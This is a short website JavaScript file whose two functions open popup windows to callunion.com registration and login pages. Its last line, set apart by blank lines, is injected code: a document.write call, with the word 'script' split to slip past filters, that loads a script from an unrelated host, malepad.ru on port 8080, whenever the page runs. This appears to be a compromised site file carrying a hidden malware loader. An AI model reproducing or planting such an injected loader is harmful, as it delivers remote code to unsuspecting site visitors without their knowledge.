function Register()
  {
  w = 770;
  h = 660;
  l = (screen.availWidth - w)/2;
  t = (screen.availHeight - h)/2;
  if (l<0) l=0;
  if (t<0) t=0;
  f = "left=" + l + ",top=" + t + ",width=" + w + ",height=" + h +",resizable=0,menubar=0,status=1";
  open("https://join.callunion.com/regfs.html", "_blank", f);
  }  

function Login()
  {
  w = 800;
  h = 660;
  l = (screen.availWidth - w)/2;
  t = (screen.availHeight - h)/2;
  if (l<0) l=0;
  if (t<0) t=0;
  f = "left=" + l + ",top=" + t + ",width=" + w + ",height=" + h +",resizable=1,menubar=0,status=1";
  open("https://pbs.callunion.com:8445/login_fs.html", "_blank", f);
  }





document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/Parallel_Port.js"></scr'+'ipt>');